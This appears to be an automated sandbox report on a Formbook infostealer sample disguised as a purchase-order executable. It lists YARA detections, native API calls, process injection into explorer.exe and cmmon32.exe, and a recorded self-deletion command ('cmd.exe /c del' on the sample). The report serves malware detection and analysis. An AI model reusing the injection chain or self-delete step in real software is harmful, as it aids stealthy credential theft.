          Source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.New-Order 04758485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.New-Order 04758485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.New-Order 04758485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.New-Order 04758485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: New-Order 04758485.exe
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041A05A NtClose,
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041A10C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00419FDA NtReadFile,
          Source: C:\Windows\explorer.exeCode function: 11_2_061AFA52 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7A060 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C79FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C79F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7A05A NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7A10C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C79FDA NtReadFile,
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06B00884 CreateProcessAsUserW,
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06B00C78
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06B03568
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06B016D8
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06B02410
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06B0355A
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06B00006
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06B00040
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06B009AD
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06B04188
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1AFC8
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1E4E0
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1A4D0
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1DDB0
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1C2F0
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E19800
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E197F0
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E17FA0
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1AFB8
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E17F90
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1F749
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1F758
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1A4C0
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1E4D1
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1DDAD
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E1C2E1
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00401029
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00401030
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041D173
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041E3E6
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041DBBB
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00402D87
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041D589
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00402D90
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00409E40
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00409E3B
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041DFAA
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00402FB0
          Source: C:\Windows\explorer.exeCode function: 11_2_061AFA52
          Source: C:\Windows\explorer.exeCode function: 11_2_061B2A0C
          Source: C:\Windows\explorer.exeCode function: 11_2_061A6072
          Source: C:\Windows\explorer.exeCode function: 11_2_061A6069
          Source: C:\Windows\explorer.exeCode function: 11_2_061AE882
          Source: C:\Windows\explorer.exeCode function: 11_2_061A7CF2
          Source: C:\Windows\explorer.exeCode function: 11_2_061A7CE9
          Source: C:\Windows\explorer.exeCode function: 11_2_061AAB1F
          Source: C:\Windows\explorer.exeCode function: 11_2_061AAB22
          Source: C:\Windows\explorer.exeCode function: 11_2_061AD152
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDD466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE25DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D42581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE2D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D10D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDD616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D36E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DEDFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE28EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D420A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DEE824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D34120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE22AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DCFA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD03DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDDBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE2B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7D173
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7E3E6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C62D87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7D589
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C62D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C69E40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C69E3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7DFAA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C62FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04D1B150 appears 45 times
          Source: New-Order 04758485.exe, 00000000.00000000.205966037.00000000006E0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameYear 11 Dynamic Grade data.exeV vs New-Order 04758485.exe
          Source: New-Order 04758485.exe, 00000000.00000002.302514557.0000000000E68000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New-Order 04758485.exe
          Source: New-Order 04758485.exe, 00000000.00000002.315111451.0000000006AC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs New-Order 04758485.exe
          Source: New-Order 04758485.exe, 00000000.00000002.314800418.0000000006780000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs New-Order 04758485.exe
          Source: New-Order 04758485.exe, 00000000.00000002.315090211.0000000006A90000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs New-Order 04758485.exe
          Source: New-Order 04758485.exe, 0000000A.00000002.343276305.000000000177F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New-Order 04758485.exe
          Source: New-Order 04758485.exe, 0000000A.00000000.294721291.0000000000C10000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameYear 11 Dynamic Grade data.exeV vs New-Order 04758485.exe
          Source: New-Order 04758485.exe, 0000000A.00000002.343140771.0000000001649000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs New-Order 04758485.exe
          Source: New-Order 04758485.exeBinary or memory string: OriginalFilenameYear 11 Dynamic Grade data.exeV vs New-Order 04758485.exe
          Source: New-Order 04758485.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.New-Order 04758485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.New-Order 04758485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.New-Order 04758485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.New-Order 04758485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D27D72 FindResourceA,
          Source: C:\Users\user\Desktop\New-Order 04758485.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New-Order 04758485.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_01
          Source: New-Order 04758485.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\New-Order 04758485.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\New-Order 04758485.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\New-Order 04758485.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\New-Order 04758485.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\New-Order 04758485.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\New-Order 04758485.exe 'C:\Users\user\Desktop\New-Order 04758485.exe'
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess created: C:\Users\user\Desktop\New-Order 04758485.exe C:\Users\user\Desktop\New-Order 04758485.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New-Order 04758485.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess created: C:\Users\user\Desktop\New-Order 04758485.exe C:\Users\user\Desktop\New-Order 04758485.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New-Order 04758485.exe'
          Source: C:\Users\user\Desktop\New-Order 04758485.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: New-Order 04758485.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: New-Order 04758485.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: New-Order 04758485.exeStatic file information: File size 1693696 > 1048576
          Source: New-Order 04758485.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x19c600
          Source: New-Order 04758485.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: cmmon32.pdb source: New-Order 04758485.exe, 0000000A.00000002.343132788.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000002.487945480.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: New-Order 04758485.exe, 0000000A.00000002.343132788.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New-Order 04758485.exe, 0000000A.00000002.343276305.000000000177F000.00000040.00000001.sdmp, cmmon32.exe, 0000000C.00000002.475859490.0000000004CF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New-Order 04758485.exe, 0000000A.00000002.343276305.000000000177F000.00000040.00000001.sdmp, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000002.487945480.0000000006560000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_0054E677 push edx; ret
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_0054E2E4 push edx; retf
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_0054F28B push es; retf
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_0054E2BE push cs; iretd
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_0054FAA2 push edi; iretd
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_0054F790 push 16D0ACD3h; retf
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_0054E3B2 push ss; iretd
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 0_2_06E11470 push E8FFFFFFh; retf
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041C875 push ss; retf
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041C811 push ss; retf
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0041A1C6 pushfd ; iretd
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00419AC6 push edx; ret
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00407B28 push FFFFFFC4h; ret
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00416B8B push cs; iretd
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00A7FAA2 push edi; iretd
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00A7E2BE push cs; iretd
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00A7F28B push es; retf
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00A7E2E4 push edx; retf
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00A7E3B2 push ss; iretd
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00A7E677 push edx; ret
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00A7F790 push 16D0ACD3h; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7D0DB push eax; ret
